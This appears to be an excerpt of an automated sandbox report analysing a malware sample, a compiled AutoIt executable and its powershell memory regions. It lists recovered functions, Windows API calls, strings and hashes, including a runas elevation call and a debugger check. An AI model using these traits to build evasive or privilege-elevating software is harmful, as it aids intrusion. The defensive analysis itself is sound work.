Function 00007FF886D738A1 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1716652374.00007FF886D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff886d70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0209f09a2c55b7643961f340c0f778a797d75443a597dea4b4f1398b8968dce
Instruction ID: b2a4388e80a51f3e016e928081a53d77cd6a3d010d59e5b0d921b519d56aaed2
Opcode Fuzzy Hash: e0209f09a2c55b7643961f340c0f778a797d75443a597dea4b4f1398b8968dce
Instruction Fuzzy Hash: 68411523E0EA864FE395866818552747BD1FFA62A0B1A41FBC04EC71D3ED1E9C05C352

Function 00007FF886D7472A Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1716652374.00007FF886D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff886d70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57a989c9beccf253a757ce674f6b625f450e13dab584ad317b0fc674ed3d4dc
Instruction ID: 00f02f4bf1b87d848358cf8b2a79120c34600d3213dc9098da072c2ee5ab2d26
Opcode Fuzzy Hash: e57a989c9beccf253a757ce674f6b625f450e13dab584ad317b0fc674ed3d4dc
Instruction Fuzzy Hash: 5E41C562E1EACB4BF2A796AC086127556D1FF926B4B5901BEC40FC71D3DD0E9C05C283

Function 00007FF886D738E1 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1716652374.00007FF886D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff886d70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 877c574fe1acc626906fa41e8baa00bffb61302da3fa63da4d53971cab9901a2
Instruction ID: 02c2634b9f676f52e0fe5a1d0182dd7b8094345141085836e0abfb1d1f77e000
Opcode Fuzzy Hash: 877c574fe1acc626906fa41e8baa00bffb61302da3fa63da4d53971cab9901a2
Instruction Fuzzy Hash: DA41F453E0EBC64FE3A5967818551B46BD1FFA52B0B4A40BAD08EC71D3ED0A9C46C343

Function 00007FF886CA5D44 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1715933575.00007FF886CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff886ca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c0b6766366105c34cd16443e8698fe290636b584282e74bb56b3465ef1e8f41
Instruction ID: 84f00b6f4810c7835337c43cea12abfa6b1ca823d8028c819b6049903571126d
Opcode Fuzzy Hash: 4c0b6766366105c34cd16443e8698fe290636b584282e74bb56b3465ef1e8f41
Instruction Fuzzy Hash: 4A01FC3171CB048FD798DF4CE496AB5B3E1FB98360F10052DE08AC3692DA36E841C746

Function 00007FF886CA43C5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1715933575.00007FF886CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff886ca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: d62682f6ae528ebe3d5ec97ffea5ff4de219cf9086084ba3331e8592e80c9437
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: CA01677111CB0C8FD744EF4CE451AA5B7E0FB95364F10056DE58AC3651D636E892CB46

Function 00007FF886CA76A9 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1715933575.00007FF886CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff886ca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 242c895abd1af1cb9046d5cef25ecc00b25591745bb386691ae0121c3f12b864
Instruction ID: e5677515aa87593dcc1d073870afe0a858aca8baa6b07f8b276ed86c37c0a808
Opcode Fuzzy Hash: 242c895abd1af1cb9046d5cef25ecc00b25591745bb386691ae0121c3f12b864
Instruction Fuzzy Hash: 00F06C3275C7048FDB4CAA1CF4429B573D1E795321B10017FF48BC2697E917E842C685

Function 00007FF886D70758 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1716652374.00007FF886D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff886d70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce1e536632c2b855b88472522797e1619644724dba4a37410f74afbbef47ff14
Instruction ID: 0c6e90f385fb5edebe167a4a2d409835c512f5dbec0b7246795d03092492ede1
Opcode Fuzzy Hash: ce1e536632c2b855b88472522797e1619644724dba4a37410f74afbbef47ff14
Instruction Fuzzy Hash: 76E0DF73E0D96E2EA7A5A69C28181F86381EF582B2B8802B7D80ED31C1EC059C108782

Non-executed Functions

Function 00007FF886CA0E70 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1715933575.00007FF886CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff886ca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe02ba8df7fff78c64fca43d680a613f8f6731c7b56c4c94f4eda82630a22a8f
Instruction ID: e86232489aa9befef20bbb266eb85a63a81a8dd47ce0125139b29d7b262dc50a
Opcode Fuzzy Hash: fe02ba8df7fff78c64fca43d680a613f8f6731c7b56c4c94f4eda82630a22a8f
Instruction Fuzzy Hash: 16A1D452D0DAD25AF31257BCA9A91A57FA1FFA33E9B0804F7C5C44B493EC08580AC393

Analysis Process: qJXhXwR.exePID: 7720, Parent PID: 7952COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.9%
Total number of Nodes:	1430
Total number of Limit Nodes:	40

Executed Functions

Function 00007FF7A51A37B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7A51A3785), ref: 00007FF7A51A37F2
IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7A51A3785), ref: 00007FF7A51A3807
GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7A51A3785), ref: 00007FF7A51A388D

Part of subcall function 00007FF7A51A3F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF7A51A38BF,?,?,?,?,?,00007FF7A51A3785), ref: 00007FF7A51A3FFD

SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7A51A3785), ref: 00007FF7A51A3924
MessageBoxA.USER32 ref: 00007FF7A51EB888
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7A51A3785), ref: 00007FF7A51EB8E1
GetForegroundWindow.USER32(?,?,?,?,?,00007FF7A51A3785), ref: 00007FF7A51EB968
ShellExecuteW.SHELL32 ref: 00007FF7A51EB98F

Part of subcall function 00007FF7A51A3B84: GetSysColorBrush.USER32 ref: 00007FF7A51A3B9E
Part of subcall function 00007FF7A51A3B84: LoadCursorW.USER32 ref: 00007FF7A51A3BAE
Part of subcall function 00007FF7A51A3B84: LoadIconW.USER32 ref: 00007FF7A51A3BC3
Part of subcall function 00007FF7A51A3B84: LoadIconW.USER32 ref: 00007FF7A51A3BDC
Part of subcall function 00007FF7A51A3B84: LoadIconW.USER32 ref: 00007FF7A51A3BF5
Part of subcall function 00007FF7A51A3B84: LoadImageW.USER32 ref: 00007FF7A51A3C21
Part of subcall function 00007FF7A51A3B84: RegisterClassExW.USER32 ref: 00007FF7A51A3C85

Part of subcall function 00007FF7A51A3CBC: CreateWindowExW.USER32 ref: 00007FF7A51A3D0C
Part of subcall function 00007FF7A51A3CBC: CreateWindowExW.USER32 ref: 00007FF7A51A3D5F
Part of subcall function 00007FF7A51A3CBC: ShowWindow.USER32 ref: 00007FF7A51A3D75

Part of subcall function 00007FF7A51A6258: Shell_NotifyIconW.SHELL32 ref: 00007FF7A51A6350

Strings

This is a third-party compiled AutoIt script., xrefs: 00007FF7A51EB87F
runas, xrefs: 00007FF7A51EB973

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 1593035822-3287110873
Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
Instruction ID: f257b5ee254b38e2b230dd1eba86c17be8b40d809087d2d0e5fddd2f24bf2c72
Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
Instruction Fuzzy Hash: 68710FA1A1E68795EA22BB60FC401F9E750AF53B44FC21135E64D062FEDE6CE549C730

Function 00007FF7A51A6580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE ref: 00007FF7A51A674B
FindResourceExW.KERNEL32 ref: 00007FF7A51A676B
LoadResource.KERNEL32 ref: 00007FF7A51EC985
SizeofResource.KERNEL32 ref: 00007FF7A51EC99E
LockResource.KERNEL32 ref: 00007FF7A51EC9B1

Strings

SCRIPT, xrefs: 00007FF7A51A675D
AU3!, xrefs: 00007FF7A51A65D8
EA06, xrefs: 00007FF7A51ECA59

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: AU3!$EA06$SCRIPT
API String ID: 3051347437-2925976212
Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
Instruction ID: 4d37f731d8d231e53f13ef9dc0727f353fa1644d67fcd76953b2c7fd001311a8
Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
Instruction Fuzzy Hash: 8491C072F0A64186EB22AB21E444A7CA7A4BB86F84FC74135DE5D477A9DF3DE444C320

Function 00007FF7A51C1D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32 ref: 00007FF7A51C1DC8
GetCurrentProcess.KERNEL32 ref: 00007FF7A51C1F42
IsWow64Process.KERNEL32 ref: 00007FF7A51C1F52
GetSystemInfo.KERNELBASE ref: 00007FF7A51C1F8B

Strings

|O, xrefs: 00007FF7A520954C

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Process$CurrentInfoSystemVersionWow64
String ID: |O
API String ID: 1568231622-607156228
Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
Instruction ID: c12c7fd842f468fcb53ec571d1fa165c0c5760b6117e44352b8ede93d63cf38d
Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
Instruction Fuzzy Hash: 09D160E1A9F286C5E621AB94AC101B9AB50AF17F84FC21035E58E437FDDE6DB904C731

Function 00007FF7A523F630 Relevance: 12.4, APIs: 8, Instructions: 350
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32 ref: 00007FF7A523F80A
GetSystemDirectoryW.KERNEL32 ref: 00007FF7A523F838
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7A523F881
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7A523F8AF

Part of subcall function 00007FF7A521FAFC: GetStdHandle.KERNEL32 ref: 00007FF7A521FB23

CreateProcessW.KERNELBASE ref: 00007FF7A523FA43
GetLastError.KERNEL32 ref: 00007FF7A523FA88
CloseHandle.KERNEL32 ref: 00007FF7A523FAC2

Part of subcall function 00007FF7A521F7DC: ~SyncLockT.VCCORLIB ref: 00007FF7A521F7E9
Part of subcall function 00007FF7A521F7DC: ~SyncLockT.VCCORLIB ref: 00007FF7A521F7F2

CloseHandle.KERNEL32 ref: 00007FF7A523FB35

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
String ID:
API String ID: 1787492119-0
Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
Instruction ID: cdb84a9d5fe9c9fddc7f45e3e7a5c4f9250b4b39b57e4b7860fbe78923c64b0d
Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
Instruction Fuzzy Hash: 0BE19C62B0AB4185EB14EB26E8501BDA7A0FB86F94F824532EE5D477ADDF3CE441C310

Function 00007FF7A521C7C0 Relevance: 6.0, APIs: 4, Instructions: 24filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 00007FF7A521C7CC
GetFileAttributesW.KERNELBASE ref: 00007FF7A521C7E0
FindFirstFileW.KERNEL32 ref: 00007FF7A521C7F3
FindClose.KERNEL32 ref: 00007FF7A521C802

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
Instruction ID: 22e3183503a15c57ffa780b581bcc949be78046090414074d97c9dba2110d61d
Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
Instruction Fuzzy Hash: C8F019A4E0A602C1EA256B64BC483359360BF96F75FD64330D57F062F9DF6CD4D94510

Function 00007FF7A51A7920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7A51A5680: GetModuleFileNameW.KERNEL32(?,00007FF7A51A7A0C,?,?,?,00007FF7A51A109E), ref: 00007FF7A51A569F

Part of subcall function 00007FF7A51C3A38: GetFullPathNameW.KERNEL32(?,00007FF7A51A7A1B,?,?,?,00007FF7A51A109E), ref: 00007FF7A51C3A5F

RegOpenKeyExW.KERNELBASE(?,?,?,00007FF7A51A109E), ref: 00007FF7A51A7A75
RegQueryValueExW.ADVAPI32(?,?,?,00007FF7A51A109E), ref: 00007FF7A51ED081
RegQueryValueExW.ADVAPI32(?,?,?,00007FF7A51A109E), ref: 00007FF7A51ED0E9
RegCloseKey.ADVAPI32(?,?,?,00007FF7A51A109E), ref: 00007FF7A51ED138
wcscat.LIBCMT ref: 00007FF7A51ED19E
wcscat.LIBCMT ref: 00007FF7A51ED1CF

Strings

Software\AutoIt v3\AutoIt, xrefs: 00007FF7A51A7A64
\Include\, xrefs: 00007FF7A51A7A1B
Include, xrefs: 00007FF7A51ED06F, 00007FF7A51ED0D2

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\Include\
API String ID: 2667193904-1575078665
Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
Instruction ID: 80c32071d6132c978c1651671c4b56d33ae9acc54797e121f22042aea3338bd1
Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
Instruction Fuzzy Hash: 2D914D61A1A682D5EB11AB24EC401B9F364FF86F44FC20136EA4D42AFDDF6CE545C760

Function 00007FF7A51A5DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32 ref: 00007FF7A51A5E76
KillTimer.USER32 ref: 00007FF7A51A5EB1
SetTimer.USER32 ref: 00007FF7A51A5ED9
RegisterWindowMessageW.USER32 ref: 00007FF7A51A5EE6
CreatePopupMenu.USER32 ref: 00007FF7A51A5EFC
PostQuitMessage.USER32 ref: 00007FF7A51A5F23

Strings

TaskbarCreated, xrefs: 00007FF7A51A5EDF

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
Instruction ID: a2d5e4f852ce93bf66132a1fca949a13fb970d13d08bd99c5df056059cf47d5e
Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
Instruction Fuzzy Hash: 41515AB1A0E64682FA66BB64FC041B9F251AF67F48FC70035E54D426FECE6DF5458220

Function 00007FF7A51A3D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00007FF7A51A3DE5
RegisterClassExW.USER32 ref: 00007FF7A51A3E16
RegisterWindowMessageW.USER32 ref: 00007FF7A51A3E2A
InitCommonControlsEx.COMCTL32 ref: 00007FF7A51A3E48
ImageList_Create.COMCTL32 ref: 00007FF7A51A3E63
LoadIconW.USER32 ref: 00007FF7A51A3E7C
ImageList_ReplaceIcon.COMCTL32 ref: 00007FF7A51A3E8F

Strings

TaskbarCreated, xrefs: 00007FF7A51A3E1C
AutoIt v3 GUI, xrefs: 00007FF7A51A3DF8

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-2659433951
Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
Instruction ID: 4dcfa7b30eceebdcd66c05878016531e3a87d0907485a778171c7a10cbf4dbc0
Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
Instruction Fuzzy Hash: A6317AB2A09B05CAE740EFA0EC443A877B4FB55B58F914138DA4C03BA8DF7DA158CB50

Function 00007FF7A51BE958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM ref: 00007FF7A51BE9C3
OleUninitialize.OLE32 ref: 00007FF7A51BEABF
UnregisterHotKey.USER32(?,?,?,00007FF7A51BE939), ref: 00007FF7A51BECD9
DestroyWindow.USER32(?,?,?,00007FF7A51BE939), ref: 00007FF7A52027E4

Strings

close all, xrefs: 00007FF7A51BE9B7

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: DestroySendStringUninitializeUnregisterWindow
String ID: close all
API String ID: 1992507300-3243417748
Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
Instruction ID: 1cacd134d44048ab8b8a623a05e55f4971eb01e6e49e1d6e8bf35520cbba1f21
Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
Instruction Fuzzy Hash: 37E13F65B0B90281EE59FB16E55027CA320BF96F44F964532DB0E532F9DF3CE8628720

Function 00007FF7A51A3B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00007FF7A51A3B9E
LoadCursorW.USER32 ref: 00007FF7A51A3BAE
LoadIconW.USER32 ref: 00007FF7A51A3BC3
LoadIconW.USER32 ref: 00007FF7A51A3BDC
LoadIconW.USER32 ref: 00007FF7A51A3BF5
LoadImageW.USER32 ref: 00007FF7A51A3C21
RegisterClassExW.USER32 ref: 00007FF7A51A3C85

Part of subcall function 00007FF7A51A3D90: GetSysColorBrush.USER32 ref: 00007FF7A51A3DE5
Part of subcall function 00007FF7A51A3D90: RegisterClassExW.USER32 ref: 00007FF7A51A3E16
Part of subcall function 00007FF7A51A3D90: RegisterWindowMessageW.USER32 ref: 00007FF7A51A3E2A
Part of subcall function 00007FF7A51A3D90: InitCommonControlsEx.COMCTL32 ref: 00007FF7A51A3E48
Part of subcall function 00007FF7A51A3D90: ImageList_Create.COMCTL32 ref: 00007FF7A51A3E63
Part of subcall function 00007FF7A51A3D90: LoadIconW.USER32 ref: 00007FF7A51A3E7C
Part of subcall function 00007FF7A51A3D90: ImageList_ReplaceIcon.COMCTL32 ref: 00007FF7A51A3E8F

Strings

AutoIt v3, xrefs: 00007FF7A51A3C3F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: AutoIt v3
API String ID: 423443420-1704141276
Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
